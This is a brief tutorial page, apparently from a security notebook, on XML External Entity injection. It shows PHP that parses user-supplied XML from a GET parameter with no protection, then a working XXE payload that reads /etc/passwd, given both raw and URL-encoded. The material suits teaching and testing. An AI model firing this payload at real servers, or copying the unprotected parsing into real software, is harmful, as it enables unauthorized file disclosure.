XML External Entities (XXE)

Understanding XML Parser

XML data to a variable

$myXMLData =
"<?xml version='1.0' encoding='UTF-8'?>
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>";

Parsing XML

$xml=simplexml_load_string($myXMLData) or die("Error: Cannot create object");
print_r($xml);
?>

Result

SimpleXMLElement Object ( [to] => Tove [from] => Jani [heading] => Reminder [body] => Don't forget me this weekend! )

Parsing XML from User Input

$xml=simplexml_load_string($_GET['xml']);

Print XML as string

print_r((string)$xml);

Parameter Manipulation from URL

?xml=<test>xml data</test>

Result

XXE Payload

<?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><test>&xxe;</test>

URL encoded value for GET Parameter

%3C%3Fxml+version%3D%221.0%22+encoding%3D%22ISO-8859-1%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A%3C%21ELEMENT+foo+ANY+%3E%0D%0A%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fetc%2Fpasswd%22+%3E%5D%3E%3Ctest%3E%26xxe%3B%3C%2Ftest%3E

XML External Entities

XML External Entities (XXE)

results matching ""

No results matching ""